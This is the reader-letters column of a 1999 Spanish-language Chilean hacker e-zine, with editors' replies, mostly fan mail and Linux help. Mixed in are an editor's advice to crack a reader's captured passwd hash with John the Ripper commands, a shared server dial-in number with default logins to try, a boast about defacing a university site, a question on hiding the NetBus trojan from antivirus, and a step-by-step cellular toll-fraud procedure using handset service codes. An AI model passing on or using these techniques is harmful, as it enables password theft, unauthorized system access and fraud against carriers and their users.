Un ejemplo de lo que aparece en ese archivo es el siguiente :

tliorty:Rny9wElj6yH.s:105:103:,,,:/home/tliorty:/usr/bin/ksh

Y asi por el estilo para todos, todos los usuarios.

Me pueden escribir a mi mail personal que es 
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 

Les quedo muy agradecido en lo que me puedan ayudar, y ADELANTE con ese
PROYECYO R ¡¡¡¡¡

    [PLX: Pues si amigo !!!, EL archivo pass que tienes es un archivos
    bueno !!! es decir no esta shadow y tiene la pass encriptada .. mira te
    recomiendo que corras el Jhon the ripper ... que esta disponible para
    varias plataformas .. no es dificil de encontrar .. pero si tienes
    problemas para encontrarlo -.. en www.jjf.org tiene que estar en el ftp
    la verdad nuestra seccion de herramientas no esta disponible ...
    la forma de uso recomendable seria ..
    john -i passwd        asi lo haces a fuerza bruta ..
    john -single passwd   asi te busca variaciones del username en la pass.

    Bueno si quieres los demas numeros de PR .. bajatelos desde
    http://www.cdlr.org ya estamos en el Numero 7 y primer a~o de
    vida ..]

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Subject:
	 Date: Tue, 15 Jun 99 09:32:22 +0000
	 From: 
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 
		 To: 
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 


Saludos a todos los integrantes del Proyecto. Soy un espa¤ol adicto a vuestro
zine desde que os encontre alla por el numero dos. La verdad es que las paso
putas hasta que salen los numeros nuevos. Es una pena que el resto de los
zines de mi bookmark ( JJF, Raregazz ) esten un poco parados, asi que
continuad con ese magnifico trabajo. Personalmente estoy trabajando en dos o
tres textos para mandaros, pero como veo que sois pocos y siempre os quejais
XDD, tambien os ofrezco ayuda para aligeraros un poco de la carga, ya sea
redaccion de textos, la pagina web, logos nuevos, solo teneis que pedirlo.
Ya que es vuestro zine el que se esta destacando, hay que ayudar a que siga
en movimiento y se amplien las fronteras. Bueno, lo dicho, ahora mismo estoy
liado con los examenes de la universidad, pero espero que pueda mandaros muy
pronto los textos que os he comentado.

P.D: Cojonuda vuestra iniciativa de MKLINUX, seguid asi.
--- Adelante con la Revolucion (electronica) !!!

Un saludo: Arkham        "Que no esta muerto lo que yace eternamente
                          y con el transcurso de los evos aun la muerte
			  puede morir"

Siento la tonteria pero me encanta Lovecraft y no me he podido
resistir.

    [Tkr: Bueno, ya que dices ayuda, bienvenidos sean los textos, ademas 
    en este momento estamos trabajando en el dise¤o de la pagina para 
    el nuevo servidor, y nos hemos matado la cabeza dise¤ando logos y toda
    esa, vaina, a ver si te apuntas y tambien participas enviando tus 
    propuestas ;) ]


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
		 Subject: cumpleañoZ
				Date: Sat, 19 Jun 1999 18:39:26 +0100
				From: "Ozono+2" <
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 >
Organization: Ozono+2
					To: 
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 

feliz cumpleañoZ


De parte de Ozono+2 . 

congratulations cabros , de parte de todo mi team , a lo mejor conocen alguno
de ellos ahoras somoz : 

Racs the wizard (por confirmar) 
Toshido Rex 
whakoz 
Kokan 

somos apenas 4 y estamos apenas organizandonos , por si nos sabian . bosta se
encarga solamente de Agrogroup , asi que no le vemoz mas por aki , saben
cabros  estamos haciendo una zine de puro metal y weadas , la vamos a sacar
pronto , hhaayyy y la nueva url es :

				 ozono2.cjb.net

tovia no subo la pagina a ese server (le corresponde uno de Xoom ) saben
ustedes si estos giles , se preocupan por le contenido de las paginas ????
perosnales.com era bueno pero esa wuea java quep onian era un mierda , hacia
puros errores en todos los browsers , asi que la deje pa puro guardar weas
(o nda los downloads ) , pero bueno , a ver si nos cuentan como es la wea pa
poner un server onda www.ozono_team.org sale muy caro ????

    [Tkr: pues la verdad no sale muy caro, pero nos agrega un monton de 
    trabajo, ahora nos toca, o le toca a PlaXiuS estar pendiente de la 
    seguridad del Server, asi que imaginate, aun no lo habiamos dado a 
    conocer y ya estabamos recibiendo ataques... ;) ]

me tinca que si , ahyyyy se me le olvidaba , revise este numero :

 123018007162836

es de un server o algo asi de 3com , es re interesante por hyper terminal ,
eso si no se que onda , uno puede dentrar poniendo puras weas yo dentro con
ADM , o USR o 3com y ADM gueno prueben ustedes , pero poquito rato , porque
la dura , no se si es un isp de chile o de usa porque entel tiene unos isp de
numero 01 , onda 1231600360360  y el 01 ese es de santiago pero este isp no
sa alguna identificacion de odnde es , pero porsiaka llamen poquito . gueno
ademas de mis congratulations de nuevo , no se como decirles que  son mis mas
grandes idolos que tengo (gueno no tanto :) ) porque yo armando un team estoy
poco cansao y ustedes reciben mails y todo eso , mmmm que wendy que son
ustedex , a todo esto... como va lo del server ????? , saben se me ocurre una
idea , podrian hacer un txt de como poner un server y luego otro txt de como
poner ese server como erver de www , ftp mail y otroZ

gueno cabros , mis reiteradas felixitaciones y que sigan asi . 


    [Tkr: ok gracias por las felicitaciones, lo del numero ya alguien cercano 
    pasara a trabajar en eso, a mi me queda dificil, ya debes saber porque.]

 Ozono+2 "Undergroup"

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
		 Subject: 
				Date: Mon, 21 Jun 1999 01:18:24 +0100
				From: "HaCk Trivial" <
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 >
Organization: trivial_hk
				 To:  
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 


==================================================
Hola Proyecto_R, somos un nuevo grupo de NewBies( por no decir hacker)que nos
separamos de nuestro anterior Grupo llamado Netstorm, y formamos Trivial_HK..
Bueno en fin te escribo para contarte de nuestra primera pagina hackeada,
http://redayuda.usach.cl.
Sin nada mas que decir, escepto que sigan adelante con su genial e-zine, se
despide Gengis_KAN, Trivial_HK

    [Tkr: mmmm, dijiste Hackeada o dijiste Crackeada...???]
    [PLX: Dejemos las cosas claras, crackear es crackear !!!! hackear es
    hackear .. creo que hay una peque¤a diferencia (la C y R x H) . 
    Saludos Trivial_HK]

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Subject: Unas felicitaciones por su sitio y una recomendacion(o petición??)
	 Date: Wed, 23 Jun 1999 03:08:38 -0400
	 From: "Ankor" <
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 >
		 To: <
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 >


Bueno dear friends los felicito, sus documentos son super buenos para las
personas que como yo intentamos aprender algo más del mundo "E", me fue muy
grato encontrar su página y echar mano de algunos(muchos) secretillos que
desconocía, su "magazine" tiene un buen contenido pero se cae en un lado, el
formato, ya que si bie es cierto los primeros 2 numeros estaban en formato de
ayuda, lo que hacía muy entretenido y muchoo más sencillo entender la
organización de la revista, el resto de los numeros no tenían esa opción,
acepto que es verdad que la mayor(por no decir toda) parte de la gente posee
un editor de texto y no así win95( o un lector para archivos de ayuda en
formato chm), podrían editar su revista en dos formatos, o por ultimo en
formato html y que incluyese frames, así yo la diseñaría con 3 frames
principales el primero con un ancho * de col y alt 25(o 17) filas con el
titulo de la revista, el segundo con altura *(el menu) y ancho 30 o 25, y el
otro con alt y anch *(el cuerpo), cosa que la haría más sencilla (en el
sentido de orden) que es de lo que carece cada una  de las publicaciones que
conozco(que realmente no son muchas), Deseandoles la mejor de las suertes y
que sigan por el camino que van se despide:
 
AnKor
http://go.fast.to/esteban

 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 

    [Tkr: La verdad me parece muy valida tu opinion, y estamos trabajando en 
    eso, lo que pasa, es que a veces estamos muy ocupados en otras cosas
    y la elaboracion de otros formatos esta a cargo de personas que no son 
    del staff que lo hacen porque les nace, o como tu, que quieren verlos
    en ese formato y simplemente lo hacen y ya.]
    [PLX: Ya tenemos la numero 1 en HTML gracias a ToniK pero la verdad
    falta mano de obra en ese sentido (la verdad no soy un balazo en el
    dise¤o de paginas, solo hago lo que puedo XDD) ahora si te interesa 
    colaborar .. es cosa que lo hagas y lo envies ..Gracias por las
    felicitaciones)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Subject: Troyanoz
	 Date: Thu, 24 Jun 1999 23:28:45 -0400
	 From: 
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 
		 To: 
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 



Soy muy nuevo en esto, tanto que aun no tengo nombre...., quiero saber, si se
puedo utilizar NetBus...sin que lo detecte el Norton Antivirus, cada vez que
lo des zipero, me da avisos...si a mi me los da supongo que a la victima
tambien...que opinana del wincrash......se que a Taker trataron de colarle el
NetBUS por IRC, creo que baje una herramienta para detectar NetBus....como
verificar si tengo puertos abiertos.....mmmmm muchas consultas...me interesa
mas la primera...


 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 ...(se que la IP va pero no he hecho nada malo)

    [Tkr: Si, afortunadamente para algunos ingenuos los antivirus reconocen
    el bo y el netbus como Troyanos, y los pueden limpiar del sistema, hasta
    el momento que yo sepa, no hay forma de evitar que esto suceda, solo
    desactivando el antivirus, pero como sabras si no te has conectado, no 
    hay manera de hacerlo. Te aconsejo que utilices otro metodo para entrar 
    a los pc's, deja de estar jodiendo con el Netbus.]

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Subject: felicihelp
	 Date: Sat, 26 Jun 99 20:30:01 -0400
	 From: me goi <
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 >
		 To: 
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 


hola soy Alpha Demon

primero los kiero felicitar por el excelente trabajo que hacen y segundo les
kiero pedir una ayuda...
alguno de ustedes sabe como se llama el programa con el cual yo llamo a una
persona y al activar el programa suena como que el otro corta y como en un
segundo suena como que la otra persona me llamara a mi y le sale a ella el
cobro...

les agradeceria si me responden mi consulta y si porciacaso pueden poner el
nombre del archivo para buscarlo...

    [Tkr: Corta...??? Cobro...??? De que me hablas..???? 

pd.. a que servidor entran (irc)
usan los mismos nicks????

    [Tkr: Nop., que tal que vieran mi archivo de logs...all day, all days...]
    [PLX: Yo a veces entro a irc.reuna.cl pero solo a veces !!!]

se despide Alpha Demon

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Subject: :)
	 Date: Sun, 04 Jul 1999 16:55:03 GMT
	 From: ozono UnderGroup <
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 >
		 To: 
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 

"Hacky cumpleaños a  uds , hacky birthday a ustedes !!!! ..... que los
cumplan FeliZ"

Mas vale tarde que nunca , me acabo de dar cuneta que en el mixmail.com no
pasan mAils a hotmail ni a bigfoot.com , asi que por casi un mes hemos estado
mandando mails a nadie mmmm , buaaaaaaaa y formatee mi disco duro .......
buaaaaaa!!!! , pero no importa , quero en nombre de todo mi team (yo soy
kokan , pero me cambie el nick ) , que somos 4 , yo , toshido rex , Racs the
wizard , y whakoz  ademas de que hay una manga mas que quiere dentrar .
per esos no se cuentan , gueno aunque sea ya tarde , quiero decearles un
feliz cumpleaños porque ustedes fueron y son nuestros mentores , y los de
muchos otros grupos chilenos , son una muestra de que en chile no somos unos
inutiles de mierda , por eso y mas ...feliz cumpleaños . a todos , aunque
solo me he relacionado con PLaxius y un poco con the taker , se que todos se
han ezforzado por igual y que los resultados estan a la vista , GRACIAS de
todo corazon les iba a mandar unas cuentas de isp , pero las perdi , asi que
mientras esperence y de ahi se las mando , pare que tengo un nuemro de
internet 800 que sirve , gueo , les cuento que mi team  ya esta
encaminaditoooo , estamos mas o menos organizados , como ya dije
anteriormente somos cuatro , ademas de que forme otro grupo , que igual antes
les habia dicho , el "AgroGroup" , y estamos por sakar una revista , que esta
re guena , ademas me baje el font page 98 en aleman , hehehe , es mas entrete
que con el notepad , porque hasta ahora hacia las paginas en el font page
express y en el notepad gueno cabros , larga vida y suerte en este mundo ,
que les siga llendo bien , asi seremos mas y mejores aun .

    [Tkr: Bueno, como viste hace unos mensajes atras, si nos llegaron los 
    correos anteriores, espero que algun dia se empiecen a ver los resultados
    del grupo, porque hace rato veo que hablan y hablan y no sacan nada 
    en concreto, bueno, pues solo digo... ;) ]

    [PLX: Definitivamente, tenemos fun club XDD !! Gracias ]

Ozono+2 "UnderGroup"
domingo 4 de julio del 99
atte Kokan 

pd =====> el nuevo mail es       
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 
y mi nuevo nick es Dude OverDrive , y mi mai lres 
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
  

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Subject: Hackers San Miguel
	 Date: Mon, 5 Jul 1999 19:12:39 -0400
	 From: "Nicolás Flores" <
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 >
		 To: <
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 >



Hola Amigos de Proyecto R:

Quisiera felicitarlos por su e-zine ya que es el mejor del under de chile,
ya que los otros sólo copian textos de otras páginas y se las dan de
Hack-Webmaster.

Quisiera pedirles que me contacten con hackers de San Miguel ya que quiero
aprender cada día más y conocer gente de aquí.

Gracias y ¡¡¡ sigan adelante !!!

    [Tkr: PlaXiuS, conoces a alguien de San Miguel...???]
    [PLX: MM si me suena SIDE creo que es de por alla pero
    la verdad hay harta gente en STGO que gusta de estos temas, por que tiene
    que ser de san miguel .. metete a IRC y trata de ubicar a alguien de 
    #underchile para que te contactes con SIDE !!!]

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Subject: SOLICITO LINUX
	 Date: Fri, 2 Jul 1999 09:13:00 -0500
	 From: "Sergio" <
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 >
		 To: <
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 >

Hola
Me encanta sus páginas y e aprendido mucho sobre internet e informatica en 
general.
 
    [Tkr: Si, estoy de acuerdo.]

Un amigo me mostro el Linux 6.0 D1 y me encanto.
 
Me presto el CD pero aun no lo he cargado mi PC es un pentium de 166 Mhz con 
64 RAM y no tiene arranque del CD por lo que tuve que hacer un Disk de 
arranque pero no me funciona arranca del disk pero no aparece nada en 
pantalla.

    [Tkr: Seguro que la tenes encendida..???, de lo contrario este puede
    ser un caso mas de...Soporte 911]
 
Me gustria comprarles el CD de Linux la ultima versión en español y si tienen 
el Office para Linux ademas me gusta el Autocad y me gustaria saber si hay 
algo similar para Linux que dibuje y reconosca los archivos AcarR14 y 
AcadR200

    [Tkr: Lo siento, pero no vendemos el Linux, talvez te lo podemos hacer
    llegar a cambio de un cd virgen, o una quemadora, si optas por la
    segunda opcion la envias a Cra. 45 # 28-36 Medellin - Colombia XDDD.
    Aclaro, esta direccion no pertenece a nadie del equipo, es producto de
    mi imaginacion.para que no vayan a decir despues que nos estamos
    aprovechando de la gente.]
 
Les pido que me contesten a 
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
   o 
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
  y 
pueden contestar a los dos Mail ya que quiero cambiar de proveedor

    [Tkr: Yo cambie de proveedor hace poco, me la estaba vendiendo verde]

Ha yo me Llamo Sergio y soy estudiande de 4 año de Ingenieria de Ejec. en 
Informatica.
 
Envien tambien direcciones sobre como instalar el Linux y donde bajar 
manuales de Linux.

    [Tkr: Yo los manuales de Linux normalmente los bajo de la estanteria
    en la biblioteca de mi cuarto y a veces paso por el proyecto Lucas ;), 
    me imagino que sabras la url, si no, fijate en la seccion links de 
    nuestra pagina]
 
Me encanto el Linux cuando lo vi es por ello que quiero aprender a usarlo lo 
bueno que tengo conocimientos en Unix y he prove en un computador de mi amigo 
algunos comandos y son iguales que el Unix ya se que el Linux es un derivado 
del Unix.
 
Creo que le Linux por lo poco que se de el es el S.O. dell mañana y hoy 
tenemos que darlo a conoser para terminar con el monopolio de la MS.
 
POR FAVOR ESCRIBAN LO MAS PRONTO POSIBLE YA QUE ESTOY ANSIOSO POR ÚSAR LINUX

    [Tkr: Ya me aturdiste, no tienes porque gritar, y ya te estoy contestando
    si quieres el Linux debes mandar tus datos personales, y asi podemos
    ver a quien le queda mas facil enviarte la copia]


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Subject: 
		 Re: Articulo: Programacion en bash
	 Date: Fri, 09 Jul 1999 23:32:27 +0000
	 From: Tomas Saieg Paez <
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 >
		 To: 
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 


Bueno, ke bien ke les haya gustado...
Mi nick es TeeSPy (si te confundiste con el mail, es por ke antes usaba
SparK, pero dejo de gustarme).

Bueno, como te gusto,  entonces creo ke me tendre ke poner en campaña
para hacer la segunda parte.
A todo esto,  para cuando krees ke esta saliendo la proxima e-zine ??.
Solo para saber y para ver cuanto tiempo tengo.

    [Tkr: La proxima ezine (No. 7) estara lista mas o menos cundo estes 
    leyendo esto, si no lo has leido es que no ha salido aun]

Ojala me de el animo y el tiempo de seguir haciendo articulos (Si los
hago,  seguro van ha ser de Linux, por ke de hacking no se mucho). Kien
sabe si ahora ke toy aprendiendo C mas adelante haga uno sobre eso...

    [Tkr: Espero que si, estaremos atentos.]

Bueno, y ultima cosa,  Cuantos años tienen ???,  es decir,  cuando veo
la palabra hackers en Internet me imagino jovenes de 15 o 16 años, como
yo, pero luego veo los grupos y estan formados de gente de 25 e incluso
mas años... Yo ke con el colegio kedo chato,  como lo hacen uds para
hacerse de tiempo ???

    [Tkr: A ver, entre todos los del grupo sumamos a ver, 5 + 23 /3 *150
    = un monton...!!! XDDD, y por lo menos yo hago todo esto durante el 
    tiempo que estoy en la oficina, pero no vayan a decir nada que dejan de 
    pagarme Horas Extras... XDDDD. Aclaracion, esto tambien es obra de
    mi imaginacion, todo lo hago despues de las 10 de la noche. ;) ]

Otra cosa, ahora si ke ultima (si les molesta ke me meta en sus vidas,
diganme ke no me meto más). Son de Stgo??, y si estudian Informatica en
la U, entonces, como es esta??

    [Tkr: No no soy de Santiago y ademas sali de la U hace algun tiempo,
    bueno no mucho. aprox 7 a~os...si, si mucho...]

Ojala estemos en contacto, si necesitan ayuda de cualquier tipo, toy
dispuesto a colaborar (con lo ke sea, graficos, web, etc). Me gustaría
poder hacer eso por ke es la mejor forma de aprender.

    [Tkr: Ya lo has dicho, te encargamos el dise¤o de la web. ;)]

Bye all---
-----TeeSPy-----

PD: Si les molesta tanta pregunta,  entonces no las respondan, pero
please respondan el mail por ke me carga ke no lo hagan. Cuando no
responden los mails, no se si llegaron o no, o si fue leido siquiera.

    [Tkr: Normalmente si nos llegan, si no respondemos es porque, mmm, porque
    mmmmmmm, no nos da la gana...]

PD2: Se me olvido poner en la introducción ke el libro esta basado en
los conocimientos adquiridos en el libro "Linux, Edicion Especial", de
la editorial que (Por cierto,  un libro n* demasiado bueno,  ojala lo
hubiera sabido cuando lo compre). Me haces el favor de poner esto en la
introducción tambien, tu veras como lo acomodas. (No  pongas la parte de
ke el libro es malo, no valla a ser ke me llegue una demanda... :-))

    [Tkr: Gente, hagan de cuenta que no leyeron el ultimo parrafo, no vaya a 
    ser que lo demanden, pero yo si lo voy a decir, ese libro es una 
    porqueria]
    [PLX: Bueno que mas decir, Tee se ha transformado en un excelente 
    colaborador de CDLR de hecho nos deleita con su primer articulo que 
    realmente es excelente. Hablando de libros malos, han leido "Hackers, 
    piratas en la RED" de una editorial espa¤ola... Buaaa la verdad es un 
    asco y lo mas triste es que gaste como 50 dolares en esa porqueria... 
    todo por que venia sellado.. Hubieran vistos esas calaberitas y sus TOP 
    SECRET.. que ridiculo ]

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Subject: Saludos
	 Date: 20 Jul 99 10:04:57 MDT
	 From: Des Integrator <
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 >
		 To: 
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 


Miembros de proyecto R y colaboradores queria felicitarlos por la e-zine ya
que creo que es de las mejores que he leido (y creanme que he leido cantidad
de material), incuyendo MINOTAURO!

    [Tkr: Gracias...]

Ademas queria unirme a su equipo en el proyecto RC5 Bovine, ya me baje el
cliente para mi asqueroso OS (se imaginaran cual es...mmm maldito moco$oft) y
lo estoy haciendo trabajar en mis 2 maquinas (la segunda armada de restos,
cada ves que le cambio algo una le agrego lo que saco a la otra). Pronto me
unire a su equipo, la unica critica que puedo hacerles es que no me gustaron
los chistes de argentinos, pero eso es obvio ya que soy argentino. Ahh y no 
se crean esas boludeces de los chistes aca tambien hay gente humilde!, bueno 
me voy despidiendo...

    [Tkr: No les hagas caso, era solo por hablar de alguien, asi como fueron 
    de argentinos pudieron haber sido de Colombianos, Chilenos o de donde 
    sea. Y ya te vi en el RC5 con nosotros.;)]

Quiero que sepan, por ultimo, que me siento orgulloso como latinoamericano de
que exista una e-zine como esta y les juro que cambio mi modo de pensar sobre
los chilenos (un amigo que fue alla les habia hecho muy mala fama). Sigan pa'
adelante y hagan mas propaganda sobre el zine ya que creo que nadie que se
interese en el tema puede rechazarlo.

    [Tkr: Yep, normalmente la gente se pone a hablar de las cosas sin saber,
    apuesto que por alla piensan que Colombia es muy peligrosa, pues te digo
    que eso es falso. Cuando quieras te invito a que vengas a pasar unas
    vacaciones en Cartagena o en San Andres y veras..!!!]


D3jumiN73GR470R
{[Desintegrator]}

Pd: les pido una opinion sobre el nick, cual de los dos prefieren? como que 
el primero es mas complicado...no?
                                                 Suerte sigan asi!

    [Tkr: Me gusta mas el segunto 35crib1r con numeros no me cuadra aun en la 
    cabeza. O sea las cosas son para lo que son.]
    [PLX: si 31373 suena muy lamer no crees ???? bueno kien soy yo para
    hablar de lamers XDDD, saludos Desintegrator y gracias por tu apoyo
    en el RC5 la verdad nos hace falta !!!]

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Subject: Consulta de Linux 6.0
	 Date: Sun, 25 Jul 1999 23:16:51 -0400
	 From: "^DaViD^" <
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 >
		 To: <
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 >


Hola Amigos:
 
Les escribo, porke me akabo de conseguir una version de linux la 6.0 que es 
capaz de bootear desde el CD, pero al momento de la instalacion me quede 
pegado al parecer en la parte en que crea la paerticion, porke no entendi Ni 
J, busque en las Eznies de ustedes pero solo encontre la instalacion normal, 
por eso les escribo para ver si ustedes tiene algun documento que explique la
instalacion de este S.O booteando desde el mismo CD. Cualquier ayuda sera muy 
bien recibida porke de Linux no cacho NADA y por eso quiero instalarlo.. (pa' 
aprender).
 
    [Tkr: Simple tenes que crear una particion swap y otra para Linux que 
    lo aconsejable es que la de swap sea el doble de RAM, a no ser que tengas
    RAM mayor de 32 MB, y la de Linux lo suficiente como para montar todos 
    los programas que necesites aprox. 600 MB para la instalacion estandar
    creo...te cuento, el RH 6 trae un programa para particionar el disco mas
    amigable que el fdisk que traia antes.]
		
    [PLX: Bueno tratare de explicarlo corto, pero en PR3 sale con mas 
    detalles primero debes tener espacio para crear las 2 particiones. puede 
    ser otro disco o utiliza fips para hacerte espacio en el disco que ya 
    tienes instalado. Ahora sigues los pasos de la instalacion hasta que te 
    pregunta que particionador deseas utilizar, le dices FDISK. ahi te 
    aparecera un prompt.. ahi le pones "m" y te muestra una lista con la 
    ayuda. Con la "p" te muestra las particiones que ya existes .. Con la "n" 
    creas una nueva particion.. eliges una primaria y te pedira un numero 
    (sige el orden nada mas) una particion debe ser de 32 MB para la swap (es 
    lo maximo recomendable) y el resto en la otra particion ... luego con la 
    "t" cambias el sistema de la particion swat .-. te pedira el numero de la 
    particion y el numero del sistema de archivos que es 32(si no me 
    equivoco) para la swap. Terminas con una "w" para grabar los cambios y 
    salir... Bueno como ya dije mas detalles en PR3]

Bueno esperando que me puedan ayudar, se despide ..
 
David

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Subject: 
	 Date: Mon, 26 Jul 1999 22:09:48 -0400
	 From: "darius" <
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 >
		 To: <
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 >


HOLA AMIGOS, ESCROBOLES POR DOS ASUNTOS:
 
1) EL LIBRO NEGRO DE LA JUSTICIA ESTA INCOMPLETO, SOLO ESTAN LOS DOS PRIMEROS 
CPITULOS SON 6, SI LO DESEAN COMPLETO ENVIAR E-MILE 

    [Tkr: No grites que nos puede oir el Gran Hermano.]
 
2) RESPECTO A LA TELEFONIA CELULAR:
LA FIRMA BELLSOUTH TIENE UN FALLO EN EL SISTEMA, LO CUAL QUIERE DECIR QUE 
PUEDES LLAMAR GRATIS...

COMO FUNCIONA:
1) CONSEGUIR TELEFONO CELULAR (OJALA NOKIA 2160) ES MÁS FACIL
2) CONTRATAR SERVICIO DE LLAMADOS  CON TARJETA VALE 5 LUCAS Y TE REGALAN 
	 ALGUNOS MINUTILLOS
3) SALIR DEL RADIO DE FUNCIONAMIENTO DE LAS TARJETAS OSEA SALIR  DE LA REGIÓN 
	 METROPOLITANA Y REGION DE VALPARAISO.  LO MAS SEGURA ES LA VI REGION 
	 RANCAGUA CENTRAL ES EXELENTE PARA ESTO
4) ESTANDO YA FUERA APRIETAS:
	 TECLA MENU Y EL NUMERO 613 OSEA MENU613 RAPIDAMENTE, ESPERAS COMO 3 
	 SEGUNDOS Y TODO VOLVERA A LA NORMALIDAD, EXEPTO PORQUE CAMBIA EN LA 
	 ESQUINA SUPERIOR DERECHA DE LA LETRA B A LA LETRA A. 
5) LUEGO DE ESO MARCAS 0(CERO) Y NUEVAMENTE SEND SI TE CONECTA A LA CENTRAL, 
	 VAMOS BIEN.
6) LA TEORIA DICE QUE TE PODRAS CONECTAR CON CUALQUIER TELEFONO DE SANTIAGO, 
	 INCLUYENDO NUMEROS DE INTERNET, LO QUE SIGNIFICA QUE SI ADEMAS TIENES UN 
	 NOTEBOOK, PRACTICAMENTE TIENES INTERNET GRATIS EN CUALQUIER MARTE, HASTA 
	 CAMINANDO LINDO NO?JI JI JI JI.
7) OTRA COSA QUE NO SE SI LES YUDE AN ALGO LOS TELEFONOS CELULARES CTC Y 
	 BELLSOUTH NOKIA 2160 TIENEN EL MISMO CODIGO DE INGRESO A SUS ARCHIVOS 
	 INTERIORES CUAL ES?
	 RESPUESTA: *3001#12345 LUEGO INMEDIATMENTE DESPUES APRIETAN LA TECLA MENU  
	 (-) TECLA CON EL SIGNO - QUE ESTA AL COSTADO SUPERIOR IZQUIERDO
8) APARECERAN UNA SERIE DE COSAS COMO:
	 FIELD TEST
	 *NAM 1
	 NAM 2
	 NAM 3
	 SECURITY
	 EMERGENCY
	 SW VERSION
	 SERIAL NO.
	 PROGRAMED
9) SI SELECCIONAN NAM 1 Y APRIETAN (-)=SELECT  APARECERA 31810 NO HACER NADA, 
	 SEGUIR NO MASCON LAS FLECHITAS ARRIBA, ABAJO  SI VAN ABAJO APARECE HOCE 
	 SOC 0 Y ASI...
	 AQUI COMIENZA LO INTERESANTE SI VUELVEN A APRETAR PA ABAJO APERECEN  
	 "OWEN NUMBER" QUE ES TU NUMERO TELEFONICO Y ESTO ESTA RELACIONADO CON LA 
	 OPCION  QUE MÁS ARRIVA "SERIAL NO." AQUI ESTA TODA LA CIENCIA YA QUE LOS 
	 CELULARES TRABAJAN CON ESTOS 2 CODIGOS QUE TIENEN UNA RELACION ALGO ASI 
	 COMO NOMBRE DE USUARIO Y CONTRASEÑA. EL PUNTO A JODER ES QUE AUN NO PILLO 
	 COMO CAMBIAR EL SW VRSION 
10) ESO DE NAM 2 3 ETC ES PARA AÑADIR NUMEROS DE TELEFONOS AL MISMO PASWER 
	 ASI CON UN MISMO PASWER SE PUEDEN TENER 2 O 3 NUMEROS
11) LUEGO SI SIGUEN BAJANDO APARECE LA OPCION PSID/RSID

JoSé MiGuEL
